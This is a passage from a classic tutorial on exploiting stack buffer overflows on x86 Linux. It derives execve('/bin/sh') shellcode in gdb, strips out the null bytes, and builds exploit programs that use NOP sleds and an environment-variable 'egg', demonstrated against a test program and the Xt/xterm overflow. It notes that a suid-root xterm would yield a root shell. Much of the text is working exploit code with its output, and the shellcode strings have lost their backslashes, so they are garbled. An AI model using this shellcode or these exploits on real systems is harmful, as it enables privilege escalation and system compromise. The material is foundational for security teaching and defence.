  printf("%d
",x);
}
------------------------------------------------------------------------------

   What we have done is add 12 to buffer1[]'s address.  This new address is
where the return address is stored.  We want to skip pass the assignment to
the printf call.  How did we know to add 8 to the return address?  We used a
test value first (for example 1), compiled the program, and then started gdb:

------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>:       pushl  %ebp
0x8000491 <main+1>:     movl   %esp,%ebp
0x8000493 <main+3>:     subl   $0x4,%esp
0x8000496 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
0x800049d <main+13>:    pushl  $0x3
0x800049f <main+15>:    pushl  $0x2
0x80004a1 <main+17>:    pushl  $0x1
0x80004a3 <main+19>:    call   0x8000470 <function>
0x80004a8 <main+24>:    addl   $0xc,%esp
0x80004ab <main+27>:    movl   $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>:    movl   0xfffffffc(%ebp),%eax
0x80004b5 <main+37>:    pushl  %eax
0x80004b6 <main+38>:    pushl  $0x80004f8
0x80004bb <main+43>:    call   0x8000378 <printf>
0x80004c0 <main+48>:    addl   $0x8,%esp
0x80004c3 <main+51>:    movl   %ebp,%esp
0x80004c5 <main+53>:    popl   %ebp
0x80004c6 <main+54>:    ret
0x80004c7 <main+55>:    nop
------------------------------------------------------------------------------

   We can see that when calling function() the RET will be 0x8004a8, and we
want to jump past the assignment at 0x80004ab.  The next instruction we want
to execute is the at 0x8004b2.  A little math tells us the distance is 8
bytes.


                                  Shell Code
                                  ~~~~~~~~~~

   So now that we know that we can modify the return address and the flow of
execution, what program do we want to execute?  In most cases we'll simply
want the program to spawn a shell.  From the shell we can then issue other
commands as we wish.  But what if there is no such code in the program we
are trying to exploit?  How can we place arbitrary instruction into its
address space?  The answer is to place the code with are trying to execute in
the buffer we are overflowing, and overwrite the return address so it points
back into the buffer.  Assuming the stack starts at address 0xFF, and that S
stands for the code we want to execute the stack would then look like this:


bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|
top of                                                            bottom of
stack                                                                 stack


The code to spawn a shell in C looks like:

shellcode.c
-----------------------------------------------------------------------------
#include <stdio.h>

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}
------------------------------------------------------------------------------

   To find out what does it looks like in assembly we compile it, and start
up gdb.  Remember to use the -static flag. Otherwise the actual code the
for the execve system call will not be included.  Instead there will be a
reference to dynamic C library that would normally would be linked in at
load time.

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:    pushl  $0x0
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:    pushl  %eax
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:    pushl  %eax
0x800014e <main+30>:    call   0x80002bc <__execve>
0x8000153 <main+35>:    addl   $0xc,%esp
0x8000156 <main+38>:    movl   %ebp,%esp
0x8000158 <main+40>:    popl   %ebp
0x8000159 <main+41>:    ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx
0x80002c0 <__execve+4>: movl   $0xb,%eax
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:        int    $0x80
0x80002d0 <__execve+20>:        movl   %eax,%edx
0x80002d2 <__execve+22>:        testl  %edx,%edx
0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:        negl   %edx
0x80002d8 <__execve+28>:        pushl  %edx
0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:        popl   %edx
0x80002df <__execve+35>:        movl   %edx,(%eax)
0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:        popl   %ebx
0x80002e7 <__execve+43>:        movl   %ebp,%esp
0x80002e9 <__execve+45>:        popl   %ebp
0x80002ea <__execve+46>:        ret
0x80002eb <__execve+47>:        nop
End of assembler dump.
------------------------------------------------------------------------------

Lets try to understand what is going on here. We'll start by studying main:

------------------------------------------------------------------------------
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp

	This is the procedure prelude.  It first saves the old frame pointer,
	makes the current stack pointer the new frame pointer, and leaves 
	space for the local variables. In this case its:

	char *name[2];

	or 2 pointers to a char. Pointers are a word long, so it leaves
	space for two words (8 bytes).

0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)

	We copy the value 0x80027b8 (the address of the string "/bin/sh")
	into the first pointer of name[]. This is equivalent to:

	name[0] = "/bin/sh";

0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)

	We copy the value 0x0 (NULL) into the seconds pointer of name[].
	This is equivalent to:

	name[1] = NULL;

	The actual call to execve() starts here.

0x8000144 <main+20>:    pushl  $0x0

	We push the arguments to execve() in reverse order onto the stack.
	We start with NULL.

0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax

	We load the address of name[] into the EAX register.

0x8000149 <main+25>:    pushl  %eax

	We push the address of name[] onto the stack.

0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax

	We load the address of the string "/bin/sh" into the EAX register.

0x800014d <main+29>:    pushl  %eax

	We push the address of the string "/bin/sh" onto the stack.

0x800014e <main+30>:    call   0x80002bc <__execve>

	Call the library procedure execve().  The call instruction pushes the
	IP onto the stack.
------------------------------------------------------------------------------

   Now execve().  Keep in mind we are using a Intel based Linux system.  The
syscall details will change from OS to OS, and from CPU to CPU.  Some will 
pass the arguments on the stack, others on the registers.  Some use a software
interrupt to jump to kernel mode, others use a far call.  Linux passes its 
arguments to the system call on the registers, and uses a software interrupt 
to jump into kernel mode.

------------------------------------------------------------------------------
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx

	The procedure prelude.

0x80002c0 <__execve+4>: movl   $0xb,%eax

	Copy 0xb (11 decimal) onto the stack. This is the index into the
	syscall table.  11 is execve.

0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx

	Copy the address of "/bin/sh" into EBX.

0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx

	Copy the address of name[] into ECX.

0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx

	Copy the address of the null pointer into %edx.

0x80002ce <__execve+18>:        int    $0x80

	Change into kernel mode.
------------------------------------------------------------------------------

So as we can see there is not much to the execve() system call.  All we need
to do is:

	a) Have the null terminated string "/bin/sh" somewhere in memory.
	b) Have the address of the string "/bin/sh" somewhere in memory
	   followed by a null long word.
	c) Copy 0xb into the EAX register.
	d) Copy the address of the address of the string "/bin/sh" into the
	   EBX register.
	e) Copy the address of the string "/bin/sh" into the ECX register.
	f) Copy the address of the null long word into the EDX register.
	g) Execute the int $0x80 instruction.

   But what if the execve() call fails for some reason?  The program will
continue fetching instructions from the stack, which may contain random data!
The program will most likely core dump.  We want the program to exit cleanly
if the execve syscall fails.  To accomplish this we must then add a exit
syscall after the execve syscall.  What does the exit syscall looks like?

exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
        exit(0);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl  %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp
0x800034f <_exit+3>:    pushl  %ebx
0x8000350 <_exit+4>:    movl   $0x1,%eax
0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
0x8000358 <_exit+12>:   int    $0x80
0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>:   movl   %ebp,%esp
0x800035f <_exit+19>:   popl   %ebp
0x8000360 <_exit+20>:   ret
0x8000361 <_exit+21>:   nop
0x8000362 <_exit+22>:   nop
0x8000363 <_exit+23>:   nop
End of assembler dump.
------------------------------------------------------------------------------

   The exit syscall will place 0x1 in EAX, place the exit code in EBX,
and execute "int 0x80".  That's it.  Most applications return 0 on exit to
indicate no errors.  We will place 0 in EBX.  Our list of steps is now:

	a) Have the null terminated string "/bin/sh" somewhere in memory.
	b) Have the address of the string "/bin/sh" somewhere in memory
	   followed by a null long word.
	c) Copy 0xb into the EAX register.
	d) Copy the address of the address of the string "/bin/sh" into the
	   EBX register.
	e) Copy the address of the string "/bin/sh" into the ECX register.
	f) Copy the address of the null long word into the EDX register.
	g) Execute the int $0x80 instruction.
	h) Copy 0x1 into the EAX register.
	i) Copy 0x0 into the EBX register.
	j) Execute the int $0x80 instruction.

   Trying to put this together in assembly language, placing the string
after the code, and remembering we will place the address of the string,
and null word after the array, we have:

------------------------------------------------------------------------------
        movl   string_addr,string_addr_addr
	movb   $0x0,null_byte_addr
        movl   $0x0,null_addr
        movl   $0xb,%eax
        movl   string_addr,%ebx
        leal   string_addr,%ecx
        leal   null_string,%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
	int    $0x80
        /bin/sh string goes here.
------------------------------------------------------------------------------

   The problem is that we don't know where in the memory space of the 
program we are trying to exploit the code (and the string that follows 
it) will be placed.  One way around it is to use a JMP, and a CALL 
instruction.  The JMP and CALL instructions can use IP relative addressing, 
which means we can jump to an offset from the current IP without needing 
to know the exact address of where in memory we want to jump to.  If we 
place a CALL instruction right before the "/bin/sh" string, and a JMP 
instruction to it, the strings address will be pushed onto the stack as 
the return address when CALL is executed.  All we need then is to copy the 
return address into a register.  The CALL instruction can simply call the 
start of our code above.  Assuming now that J stands for the JMP instruction,
C for the CALL instruction, and s for the string,  the execution flow would 
now be:


bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|            |
           |||_____________||____________| (1)
       (2)  ||_____________||
             |______________| (3)
top of                                                            bottom of
stack                                                                 stack



   With this modifications, using indexed addressing, and writing down how
many bytes each instruction takes our code looks like:

------------------------------------------------------------------------------
        jmp    offset-to-call           # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,array-offset(%esi)  # 3 bytes
        movb   $0x0,nullbyteoffset(%esi)# 4 bytes
        movl   $0x0,null-offset(%esi)   # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   array-offset,(%esi),%ecx # 3 bytes
        leal   null-offset(%esi),%edx   # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax		# 5 bytes
        movl   $0x0, %ebx		# 5 bytes
	int    $0x80			# 2 bytes
        call   offset-to-popl           # 5 bytes
        /bin/sh string goes here.
------------------------------------------------------------------------------

   Calculating the offsets from jmp to call, from call to popl, from
the string address to the array, and from the string address to the null
long word, we now have:

------------------------------------------------------------------------------
        jmp    0x26                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)		# 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax		# 5 bytes
        movl   $0x0, %ebx		# 5 bytes
	int    $0x80			# 2 bytes
        call   -0x2b                    # 5 bytes
        .string "/bin/sh"		# 8 bytes
------------------------------------------------------------------------------

   Looks good. To make sure it works correctly we must compile it and run it.
But there is a problem.  Our code modifies itself, but most operating system
mark code pages read-only.  To get around this restriction we must place the
code we wish to execute in the stack or data segment, and transfer control
to it.  To do so we will place our code in a global array in the data
segment.  We need first a hex representation of the binary code. Lets
compile it first, and then use gdb to obtain it.

shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x2a                     # 3 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string "/bin/sh"             # 8 bytes
");
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
0x8000136 <main+6>:     movl   %esi,0x8(%esi)
0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
0x800013d <main+13>:    movl   $0x0,0xc(%esi)
0x8000144 <main+20>:    movl   $0xb,%eax
0x8000149 <main+25>:    movl   %esi,%ebx
0x800014b <main+27>:    leal   0x8(%esi),%ecx
0x800014e <main+30>:    leal   0xc(%esi),%edx
0x8000151 <main+33>:    int    $0x80
0x8000153 <main+35>:    movl   $0x1,%eax
0x8000158 <main+40>:    movl   $0x0,%ebx
0x800015d <main+45>:    int    $0x80
0x800015f <main+47>:    call   0x8000135 <main+5>
0x8000164 <main+52>:    das
0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>:    das
0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>:     0xeb
(gdb)
0x8000134 <main+4>:     0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------

testsc.c
------------------------------------------------------------------------------
char shellcode[] =
	"xebx2ax5ex89x76x08xc6x46x07x00xc7x46x0cx00x00x00"
	"x00xb8x0bx00x00x00x89xf3x8dx4ex08x8dx56x0cxcdx80"
	"xb8x01x00x00x00xbbx00x00x00x00xcdx80xe8xd1xffxff"
	"xffx2fx62x69x6ex2fx73x68x00x89xecx5dxc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------

   It works! But there is an obstacle.  In most cases we'll be trying to
overflow a character buffer.  As such any null bytes in our shellcode will be
considered the end of the string, and the copy will be terminated.  There must
be no null bytes in the shellcode for the exploit to work.  Let's try to
eliminate the bytes (and at the same time make it smaller).

           Problem instruction:                 Substitute with:
           --------------------------------------------------------
           movb   $0x0,0x7(%esi)                xorl   %eax,%eax
	   molv   $0x0,0xc(%esi)                movb   %eax,0x7(%esi)
                                                movl   %eax,0xc(%esi)
           --------------------------------------------------------
           movl   $0xb,%eax                     movb   $0xb,%al
           --------------------------------------------------------
           movl   $0x1, %eax                    xorl   %ebx,%ebx
           movl   $0x0, %ebx                    movl   %ebx,%eax
                                                inc    %eax
           --------------------------------------------------------

   Our improved code:

shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x1f                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        xorl   %eax,%eax                # 2 bytes
	movb   %eax,0x7(%esi)		# 3 bytes
        movl   %eax,0xc(%esi)           # 3 bytes
        movb   $0xb,%al                 # 2 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        xorl   %ebx,%ebx                # 2 bytes
        movl   %ebx,%eax                # 2 bytes
        inc    %eax                     # 1 bytes
        int    $0x80                    # 2 bytes
        call   -0x24                    # 5 bytes
        .string "/bin/sh"             # 8 bytes
					# 46 bytes total
");
}
------------------------------------------------------------------------------

   And our new test program:

testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
	"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
	"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
	"x80xe8xdcxffxffxff/bin/sh";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------


                              Writing an Exploit
                              ~~~~~~~~~~~~~~~~~~
                          (or how to mung the stack)
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~


   Lets try to pull all our pieces together.  We have the shellcode.  We know
it must be part of the string which we'll use to overflow the buffer.  We 
know we must point the return address back into the buffer.  This example will
demonstrate these points:

overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
        "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
        "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
        "x80xe8xdcxffxffxff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exploit1 exploit1.c
[aleph1]$ ./exploit1
$ exit
exit
[aleph1]$
------------------------------------------------------------------------------

   What we have done above is filled the array large_string[] with the
address of buffer[], which is where our code will be.  Then we copy our
shellcode into the beginning of the large_string string.  strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located.  Once we reach the end of main and it tried to return it
jumps to our code, and execs a shell.

   The problem we are faced when trying to overflow the buffer of another
program is trying to figure out at what address the buffer (and thus our
code) will be.  The answer is that for every program the stack will
start at the same address.  Most programs do not push more than a few hundred
or a few thousand bytes into the stack at any one time.  Therefore by knowing
where the stack starts we can try to guess where the buffer we are trying to
overflow will be.  Here is a little program that will print its stack
pointer:

sp.c
------------------------------------------------------------------------------
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}
void main() {
  printf("0x%x
", get_sp());
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ ./sp
0x8000470
[aleph1]$
------------------------------------------------------------------------------

   Lets assume this is the program we are trying to overflow is:

vulnerable.c
------------------------------------------------------------------------------
void main(int argc, char *argv[]) {
  char buffer[512];

  if (argc > 1)
    strcpy(buffer,argv[1]);
}
------------------------------------------------------------------------------

   We can create a program that takes as a parameter a buffer size, and an
offset from its own stack pointer (where we believe the buffer we want to
overflow may live).  We'll put the overflow string in an environment variable
so it is easy to manipulate:

exploit2.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512

char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.
");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x
", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

   Now we can try to guess what the buffer and offset should be:

------------------------------------------------------------------------------
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------

   As we can see this is not an efficient process.  Trying to guess the
offset even while knowing where the beginning of the stack lives is nearly
impossible.  We would need at best a hundred tries, and at worst a couple of
thousand.  The problem is we need to guess *exactly* where the address of our 
code will start.  If we are off by one byte more or less we will just get a
segmentation violation or a invalid instruction.  One way to increase our
chances is to pad the front of our overflow buffer with NOP instructions.
Almost all processors have a NOP instruction that performs a null operation.
It is usually used to delay execution for purposes of timing.  We will take
advantage of it and fill half of our overflow buffer with them.  We will place
our shellcode at the center, and then follow it with the return addresses. If
we are lucky and the return address points anywhere in the string of NOPs,
they will just get executed until they reach our code.  In the Intel
architecture the NOP instruction is one byte long and it translates to 0x90
in machine code.  Assuming the stack starts at address 0xFF, that S stands for
shell code, and that N stands for a NOP instruction the new stack would look
like this:

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
                 ^                     |
                 |_____________________|
top of                                                            bottom of
stack                                                                 stack

   The new exploits is then:

exploit3.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define NOP                            0x90

char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.
");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x
", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

   A good selection for our buffer size is about 100 bytes more than the size
of the buffer we are trying to overflow.  This will place our code at the end
of the buffer we are trying to overflow, giving a lot of space for the NOPs,
but still overwriting the return address with the address we guessed.  The
buffer we are trying to overflow is 512 bytes long, so we'll use 612.  Let's
try to overflow our test program with our new exploit:

------------------------------------------------------------------------------
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------

   Whoa!  First try!  This change has improved our chances a hundredfold. 
Let's try it now on a real case of a buffer overflow.  We'll use for our
demonstration the buffer overflow on the Xt library.  For our example, we'll 
use xterm (all programs linked with the Xt library are vulnerable). You must
be running an X server and allow connections to it from the localhost.  Set
your DISPLAY variable accordingly.

------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit3 1124
Using address: 0xbffffdb4
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "^1FF
                           
                            V

1@/bin/sh


















^C
[aleph1]$ exit
[aleph1]$ ./exploit3 2148 100
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "^1FF
                           
                            V

1@/bin/shHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH








HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH








HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH








HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH








HHHHHHHHHHHH
Warning: some arguments in previous message were lost
Illegal instruction
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit4 2148 600
Using address: 0xbffffb54
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "^1FF
                           
                            V

1@/bin/shTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT








TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT








TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT








TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT








TTTTTTTTTTTT
Warning: some arguments in previous message were lost
bash$
------------------------------------------------------------------------------

   Eureka! Less than a dozen tries and we found the magic numbers. If xterm
where installed suid root this would now be a root shell.


                            Small Buffer Overflows
                            ~~~~~~~~~~~~~~~~~~~~~~

   There will be times when the buffer you are trying to overflow is so
small that either the shellcode wont fit into it, and it will overwrite the
return address with instructions instead of the address of our code, or the
number of NOPs you can pad the front of the string with is so small that the
chances of guessing their address is minuscule.  To obtain a shell from these
programs we will have to go about it another way.  This particular approach
only works when you have access to the program's environment variables.

   What we will do is place our shellcode in an environment variable, and
then overflow the buffer with the address of this variable in memory.  This
method also increases your changes of the exploit working as you can make
the environment variable holding the shell code as large as you want.

   The environment variables are stored in the top of the stack when the
program is started, any modification by setenv() are then allocated
elsewhere.  The stack at the beginning then looks like this:


      <strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp>

   Our new program will take an extra variable, the size of the variable
containing the shellcode and NOPs. Our new exploit now looks like this:

exploit4.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
